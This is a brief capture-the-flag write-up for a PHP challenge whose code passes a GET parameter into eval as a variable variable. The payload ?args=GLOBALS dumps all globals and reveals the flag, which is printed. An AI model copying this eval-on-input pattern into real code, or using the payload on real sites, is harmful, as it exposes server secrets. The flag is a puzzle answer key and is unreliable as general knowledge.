0. Open the web page and view the PHP source code
flag In the variable ! <?php
error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
$args = $_GET['args'];
if(!preg_match("/^\w+$/",$args)){
die("args error!");
}
eval("var_dump($$args);");
}
?>Found the hint: flag In the variable! The flag is hidden in the variable, and then by looking at the title code, it is found that the final output is a variable named $args.
The function of $GLOBALS in PHP is to refer to all variables available in the global scope, so you only need to set the value of $args to GLOBALS, enter /?args=GLOBALS in the URL, and find the flag.
1. Enter payload:?args=GLOBALS
2. Get the flag: flag{fbc97e37ff7be3ac0402acc966f4e403}